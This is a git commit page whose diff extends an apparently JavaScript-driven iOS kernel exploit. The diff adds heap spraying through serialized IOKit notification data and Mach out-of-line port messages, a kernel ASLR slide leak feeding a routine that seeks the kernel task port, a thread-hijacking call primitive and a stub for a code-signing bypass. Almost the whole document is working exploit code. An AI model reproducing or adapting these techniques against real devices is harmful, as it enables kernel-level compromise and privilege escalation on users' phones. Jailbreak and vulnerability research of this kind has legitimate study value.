yeet

author: spv420 <unomilliono@gmail.com> 2022-04-24 16:07:43 -0400
committer: spv420 <unomilliono@gmail.com> 2022-04-24 16:07:43 -0400
commit: 5f9294a0e7aac5b9e105ccee737e42fc5c4cff63 (patch)
tree: b8ef302dd9fe15a105869a64f7cf515ab7b8dbf1 /src
parent: 8d989c872c7127f12ebc19b0c9a98916657f571f (diff)
4 files changed, 134 insertions, 14 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 402dd9f..c28e59c 100644
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -19,6 +19,15 @@ var kport_ip_srights4 = 0x70;
 var KERN_SUCCESS = 0;
 var NULL = 0;
 var MACH_PORT_NULL = 0;
+var req_init_port_set = 0x1c;
+var req_head_msgh_bits = 0x0;
+var req_head_msgh_request_port = 0x8;
+var req_head_msgh_reply_port = 0xc;
+var req_head_msgh_id = 0x14;
+var req_msgh_body_msgh_descriptor_count = 0x18;
+var MACH_MSG_OOL_PORTS_DESCRIPTOR = 0x2;
+var req_init_port_set_address = 0x0
+var req_init_port_set_count = 0x4
 
 var kslide = 0;
 
@@ -62,11 +71,7 @@ function spray_data(mem, size, num, portptr) {
 	write_u32(dict + (__cnt << 2), kOSSerializeEndCollection | kOSSerializeArray | num); __cnt++;
 
 	for (var i = 0; i < num; i++) {
-		if (i == (num - 1)) {
-			write_u32(dict + (__cnt << 2), kOSSerializeEndCollection | kOSSerializeData | SIZEOF_BYTES_MSG); __cnt++;
-		} else {
-			write_u32(dict + (__cnt << 2), kOSSerializeData | SIZEOF_BYTES_MSG); __cnt++;
-		}
+		write_u32(dict + (__cnt << 2), ((i == num - 1) ? kOSSerializeEndCollection : 0) | kOSSerializeData | SIZEOF_BYTES_MSG); __cnt++;
 		if (mem != 0 && size != 0) {
 			memcpy(dict + (__cnt << 2), mem, size);
 		}
@@ -136,10 +141,86 @@ function copyinPort(kport, cnt) {
 			printf("still alive? %x\n", 420);
 			printf("YOLO YOLO YOLO kaslr_slide=%s\n", kslide.toString(16));
 			found = true;
-			return (read_u32(buf + (4 << 2)) - 0x78);
+			return ((read_u32(buf + (4 << 2)) - 0x78)) >>> 0;
 		}
 	}
+}
+
+function prepare_ptr(dict, size, ptr, num) {
+	var idx = 0;
+	write_u32(dict + (idx << 2), kOSSerializeMagic); idx++;
+	write_u32(dict + (idx << 2), kOSSerializeEndCollection | kOSSerializeDictionary | 1); idx++;
+	write_u32(dict + (idx << 2), kOSSerializeSymbol | 4); idx++;
+	write_u32(dict + (idx << 2), 0x0079656b); idx++;
+	write_u32(dict + (idx << 2), (kOSSerializeEndCollection | kOSSerializeArray | (num >>> 0))); idx++;
+	for (var i = 0; i < num; i++) {
+		write_u32(dict + (idx << 2), ((i == (num - 1)) ? kOSSerializeEndCollection : 0) | kOSSerializeData | 8); idx++;
+		write_u32(dict + (idx << 2), ptr); idx++;
+		write_u32(dict + (idx << 2), ptr); idx++;
+	}
+
+	write_u32(size, idx * 4);
+	return KERN_SUCCESS;
+}
+
+function spray(dict, size, port) {
+	var err = malloc(4);
+	var ret = 0;
+	var master = malloc(4);
+
+	host_get_io_master(mach_host_self(), master);
+	io_service_add_notification_ool(master, "IOServiceTerminate", dict, size, MACH_PORT_NULL, NULL, 0, err, port);
+
+	if (ret == KERN_SUCCESS) {
+		ret = read_u32(err);
+	}
 
+	return ret;
+}
+
+var kp = 0;
+function spray_ports(number_port_descs) {
+	printf("spray_ports\n");
+	if (kp == 0) {
+		kp = malloc(4);
+		mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, kp);
+		mach_port_insert_right(mach_task_self(), read_u32(kp), read_u32(kp), MACH_MSG_TYPE_MAKE_SEND);
+	}
+
+	var mp = malloc(4);
+
+	mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, mp);
+	printf("%x\n", read_u32(mp));
+	mach_port_insert_right(mach_task_self(), read_u32(mp), read_u32(mp), MACH_MSG_TYPE_MAKE_SEND);
+
+	send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs);
+	return mp;
+}
+
+function send_ports(target, payload, num, number_port_descs) {
+	var init_port_set = malloc(num * 4);
+
+	for (var i = 0; i < num; i++) {
+		write_u32(init_port_set + (i << 2), payload);
+	}
+
+	var buf = malloc(0x1c + (number_port_descs * 0xc));
+	write_u32(buf + req_msgh_body_msgh_descriptor_count, number_port_descs);
+
+	for (var i = 0; i < number_port_descs; i++) {
+		write_u32(buf + (req_init_port_set * (i + 1)) + req_init_port_set_address, init_port_set);
+		write_u32(buf + (req_init_port_set * (i + 1)) + req_init_port_set_count, num);
+		write_u8(buf + (req_init_port_set * (i + 1)) + 0x8, 0);
+		write_u8(buf + (req_init_port_set * (i + 1)) + 0xa, 19);
+		write_u8(buf + (req_init_port_set * (i + 1)) + 0xb, MACH_MSG_OOL_PORTS_DESCRIPTOR);
+	}
+
+	write_u32(buf + req_head_msgh_bits, 0x80001513); // MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE)
+	write_u32(buf + req_head_msgh_request_port, target);
+	write_u32(buf + req_head_msgh_reply_port, 0);
+	write_u32(buf + req_head_msgh_id, 1337);
+
+	return mach_msg(read_u32(buf + 0x0), read_u32(buf + 0x4), read_u32(buf + 0x8), read_u32(buf + 0xc), read_u32(buf + 0x10), read_u32(buf + 0x14), 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);
 }
 
 function get_kernel_task() {
@@ -169,8 +250,8 @@ function get_kernel_task() {
 	var big_buf = malloc(MIG_MAX);
 	var small_buf = malloc(MIG_MAX);
 	
-	var big_size = 0;
-	var small_size = 0;
+	var big_size = malloc(4);
+	var small_size = malloc(4);
 
 	var fp = malloc(PORTS_NUM * 4);
 	var postSpray = malloc(4);
@@ -180,6 +261,22 @@ function get_kernel_task() {
 	var kptr = copyinPort(kport, 2);
 
 	printf("0x%08x\n", kptr);
+	write_u32(data, kptr);
+	write_u32(data + 4, kptr);
+
+	prepare_ptr(big_buf, big_size, kptr, 256);
+	prepare_ptr(small_buf, small_size, kptr, 32);
+
+	for (var i = 0; i < PORTS_NUM_PRESPRAY; i++) {
+		var dummy = malloc(4);
+		spray(big_buf, big_size, dummy);
+	}
+
+	for (var i = 0; i < PORTS_NUM; i++) {
+		write_u32(fp + (i << 2), spray_ports(i));
+		var dummy = malloc(4);
+		spray(small_buf, small_size, dummy);
+	}
 
 	printf("get lucky\n");
 
diff --git a/src/js/lib/myutils.js b/src/js/lib/myutils.js
index f3eb976..51fc055 100644
--- a/src/js/lib/myutils.js
+++ b/src/js/lib/myutils.js
@@ -111,4 +111,5 @@ var IOServiceMatching = scall_wrapper("IOServiceMatching");
 var io_service_open_extended = scall_wrapper("io_service_open_extended");
 var IORegistryEntryGetChildIterator = scall_wrapper("IORegistryEntryGetChildIterator");
 var IOIteratorNext = scall_wrapper("IOIteratorNext");
-var IORegistryEntryGetProperty = scall_wrapper("IORegistryEntryGetProperty");
-\ No newline at end of file
+var IORegistryEntryGetProperty = scall_wrapper("IORegistryEntryGetProperty");
+var mach_msg = scall_wrapper("mach_msg");
+\ No newline at end of file
diff --git a/src/js/main.js b/src/js/main.js
index b3b0e4c..4d978ef 100644
--- a/src/js/main.js
+++ b/src/js/main.js
@@ -22,6 +22,10 @@ try {
 	puts = function (){};
 }
 
+function csbypass() {
+
+}
+
 function main() {
 	/*
 	 *  get slide and calculate slid base
@@ -41,6 +45,8 @@ function main() {
 	puts("we out here");
 	puts("I came through a portal holding a 40 and a blunt. Do you really wanna test me right now?");
 
+//	csbypass();
+
 	printf("slide=0x%x\n", slide);
 	printf("*(uint8_t*)base = 0x%x\n", read_u8(base));
 	printf("*(uint16_t*)base = 0x%x\n", read_u16(base));
diff --git a/src/js/primitives/call.js b/src/js/primitives/call.js
index 9bb43c1..97a47b6 100644
--- a/src/js/primitives/call.js
+++ b/src/js/primitives/call.js
@@ -167,6 +167,11 @@ function callnarg() {
 	}
 
 	/*
+	 *  r9
+	 */
+	write_u32(thread_state + (11 << 2), 0x1337);
+
+	/*
 	 *  stack
 	 */
 	write_u32(thread_state + (13 << 2), stack_shit);
@@ -199,7 +204,6 @@ function callnarg() {
 	 *  probably un-necessary now, keeping in just in case for now
 	 */
 	calls4arg("thread_resume", read_u32(th), 0, 0, 0);
-	calls4arg("usleep", 1000, 0, 0, 0);
 
 	/*
 	 *  spin wait for return
@@ -208,19 +212,19 @@ function callnarg() {
 		/*
 		 *  reset, it's used as input for thread_state size
 		 */
-		write_u32(count, 0x1000);
+		write_u32(count, 0x100);
 		calls4arg("thread_get_state", read_u32(th), ARM_THREAD_STATE, thread_state, count);
 
 		/*
 		 *  if the pc is in (resolver, resolver + 8), suspend the thread
 		 *  (to not spin endlessly), read r0 and return
 		 */
-		if ((read_u32(thread_state + (15 << 2)) - (__stack_chk_fail_resolver + dyld_shc_slide)) <= 8) {
+		if (((read_u32(thread_state + (15 << 2)) - (__stack_chk_fail_resolver + dyld_shc_slide)) <= 8) && (read_u32(thread_state + (11 << 2)) == 0x1337)) {
 			calls4arg("thread_suspend", read_u32(th), 0, 0, 0);
 			return read_u32(thread_state);
 		}
 
-		calls4arg("usleep", 1000, 0, 0, 0);
+//		calls4arg("usleep", 1000, 0, 0, 0);
 	}
 }
 
@@ -249,6 +253,7 @@ function scall() {
 	}
 
 	var args_to_pass = new Array();
+	var force_callnarg = false;
 
 	args_to_pass.push(addy);
 
@@ -257,10 +262,21 @@ function scall() {
 			args_to_pass.push(sptr(arguments[i]));
 		} else {
 			args_to_pass.push(arguments[i]);
+			if ((arguments[i] & 0xffff0000 == 0xffff0000 || arguments[i] & 0xffff0000 == 0xfffe0000)) {
+				force_callnarg = true;
+			}
 		}
 	}
 
 //	printf("%s\n", args_to_pass.toString());
 
-	return callnarg.apply(this, args_to_pass);
+	if (args_to_pass.length > 5 || force_callnarg) {
+		return callnarg.apply(this, args_to_pass);
+	} else {
+		var count_to_me = 5 - arguments.length;
+		for (var i = 0; i < count_to_me; i++) {
+			args_to_pass.push(0);
+		}
+		return call4arg.apply(this, args_to_pass)
+	}
 }
 \ No newline at end of file
author	spv420 <unomilliono@gmail.com>	2022-04-24 16:07:43 -0400
committer	spv420 <unomilliono@gmail.com>	2022-04-24 16:07:43 -0400
commit	5f9294a0e7aac5b9e105ccee737e42fc5c4cff63 (patch)
tree	b8ef302dd9fe15a105869a64f7cf515ab7b8dbf1 /src
parent	8d989c872c7127f12ebc19b0c9a98916657f571f (diff)